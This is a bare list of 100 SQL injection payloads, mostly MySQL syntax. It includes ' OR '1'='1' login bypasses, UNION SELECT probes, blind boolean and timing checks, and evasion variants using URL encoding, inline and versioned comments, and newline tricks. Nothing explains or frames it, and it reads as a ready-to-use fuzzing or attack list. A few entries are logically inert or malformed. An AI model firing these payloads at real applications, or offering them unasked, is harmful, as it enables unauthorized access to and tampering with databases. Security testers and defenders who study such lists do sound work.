1. ' OR '1'='1' AND 'TEST'='TEST' --
2. ' OR '1'='1' AND 'TEST'='TEST' #
3. ' OR '1'='1' AND 'TEST'='TEST' /*
4. ' UNION SELECT NULL, 'TEST' --
5. ' UNION SELECT NULL, 'TEST' #
6. ' UNION SELECT 'TEST', NULL --
7. ' UNION SELECT 'TEST', NULL #
8. ' UNION/**/SELECT/**/'TEST' --
9. ' UNION%0ASELECT%0A'TEST'--
10. ' OR 1=1--TEST
11. %27OR%271%27%3D%271%27--TEST
12. %27%20OR%201=1--TEST
13. ' OR 1=1 LIMIT 1 OFFSET 0 --
14. ' OR EXISTS(SELECT*FROM users WHERE name='TEST')--
15. ' OR (SELECT 'TEST')='TEST' --
16. ' OR 1=1#TEST
17. %27%20UNION%20SELECT%20%27TEST%27,null--
18. ' OR TRUE AND 'TEST'='TEST' --
19. ') OR ('1'='1' AND 'TEST'='TEST' --
20. ")) OR ((("TEST"="TEST"
21. ' OR 1=1 AND ASCII(SUBSTRING('TEST',1,1))=84--
22. ' OR LENGTH('TEST')=4--
23. ' OR 'TEST' LIKE 'TE%' --
24. ' OR 'TEST' REGEXP '^T' --
25. ' OR (SELECT COUNT(*) FROM users)>0 AND 'TEST'='TEST' --
26. ' OR 1=1 /*TEST*/
27. ' UNION SELECT HEX('TEST')--
28. ' OR 'TEST' IN (SELECT 'TEST') --
29. ' OR JSON_CONTAINS('["TEST"]', '"TEST"') --
30. ' OR FIND_IN_SET('TEST','TEST,OTHER') --
31. %27%20UNION%20ALL%20SELECT%20NULL,%27TEST%27--
32. ' OR 'TEST'=(SELECT 'TEST')--
33. ' OR 'A' LIKE 'TE%' --
34. ' UNION SELECT REPEAT('TEST',1)--
35. ' AND (SELECT COUNT(*) FROM dual WHERE 'TEST'='TEST')>0 --
36. ' AND ASCII(SUBSTRING('TEST',1,1))=84--
37. ' AND 'A'='A' AND 'TEST'='TEST'--
38. ' OR (SELECT CASE WHEN (1=1) THEN 'TEST' ELSE NULL END)='TEST'--
39. ' AND 1=1; --TEST
40. ' OR ''=' AND 'TEST'='TEST'--
41. ' OR (SELECT IF('TEST'='TEST',1,0))=1--
42. ' OR (SELECT LENGTH('TEST'))=4--
43. ' OR CAST('TEST' AS CHAR)=CHAR(84,69,83,84)--
44. ' AND POSITION('T' IN 'TEST')=1--
45. ' AND SUBSTRING('TEST',1,4)='TEST'--
46. ' OR CONCAT('T','E','S','T')='TEST'--
47. ' OR CHAR_LENGTH('TEST')=4--
48. ' OR LOWER('TEST')='test'--
49. ' OR UPPER('test')='TEST'--
50. ' OR RTRIM('TEST')='TEST'--
51. ' OR LTRIM('TEST')='TEST'--
52. ' OR TRIM('TEST')='TEST'--
53. ' OR REPLACE('TEST','E','E')='TEST'--
54. ' OR RIGHT('TEST',1)='T'--
55. ' OR LEFT('TEST',1)='T'--
56. ' OR MID('TEST',2,2)='ES'--
57. ' OR LOCATE('E','TEST')=2--
58. ' OR STRCMP('TEST','TEST')=0--
59. ' OR FIELD('TEST','TEST','TEST2')=1--
60. ' OR FORMAT(123456,'TEST') IS NOT NULL--
61. ' OR REPEAT('TEST',1)='TEST'--
62. ' OR LPAD('TEST',4,'X')='TEST'--
63. ' OR RPAD('TEST',4,'X')='TEST'--
64. ' OR 'TEST' BETWEEN 'TA' AND 'TZ'--
65. ' OR ELT(1,'TEST','ABC')='TEST'--
66. ' OR EXPORT_SET(1,'TEST')='TEST'--
67. ' OR MAKE_SET(1,'TEST')='TEST'--
68. ' OR 'TEST' RLIKE '^TE.*'--
69. ' OR 'TEST' NOT LIKE 'ABC'--
70. ' OR NOT ('TEST' != 'TEST')--
71. ' OR COALESCE(NULL,'TEST')='TEST'--
72. ' OR NULLIF('TEST','OTHER')='TEST'--
73. ' OR IFNULL(NULL,'TEST')='TEST'--
74. ' OR GREATEST('TEST','ABC')='TEST'--
75. ' OR LEAST('TEST','ZZZ')='TEST'--
76. ' OR BIN(20) LIKE '%TEST%'--
77. ' OR OCT(84) LIKE '%TEST%'--
78. ' OR HEX('TEST')=54655354--
79. ' OR CHAR(84,69,83,84)='TEST'--
80. '/**/OR/**/'TEST'/**/=/**/'TEST'--
81. '/*!50000OR*/'TEST'='TEST'--
82. ' OR SLEEP(0) AND 'TEST'='TEST'--
83. ' OR 1=1 PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x7e,'TEST')),1)--
84. ' OR 1=1 AND GTID_SUBSET('TEST','TEST')--
85. ' OR 1=1 AND JSON_EXTRACT('{"key":"TEST"}', '$.key')='TEST'--
86. ' OR EXISTS(SELECT * FROM dual WHERE 'TEST'='TEST')--
87. ' OR 'A' COLLATE utf8_general_ci = 'TEST' COLLATE utf8_general_ci--
88. ' OR 'TEST' LIKE BINARY 'TEST'--
89. ' OR CONVERT('TEST' USING latin1)='TEST'--
90. ' OR UNHEX(HEX('TEST'))='TEST'--
91. ' OR DECODE(ENCODE('TEST','key'),'key')='TEST'--
92. ' OR AES_DECRYPT(AES_ENCRYPT('TEST','key'),'key')='TEST'--
93. ' OR MD5('TEST')=MD5('TEST')--
94. ' OR SHA1('TEST')=SHA1('TEST')--
95. ' OR SHA2('TEST',256)=SHA2('TEST',256)--
96. ' OR PASSWORD('TEST')=PASSWORD('TEST')--
97. ' OR TO_BASE64('TEST')=TO_BASE64('TEST')--
98. ' OR FROM_BASE64(TO_BASE64('TEST'))='TEST'--
99. ' OR CONNECTION_ID()>0 AND 'TEST'='TEST'--
100. ' OR 'TEST' BETWEEN 'TEST' AND 'TEST'--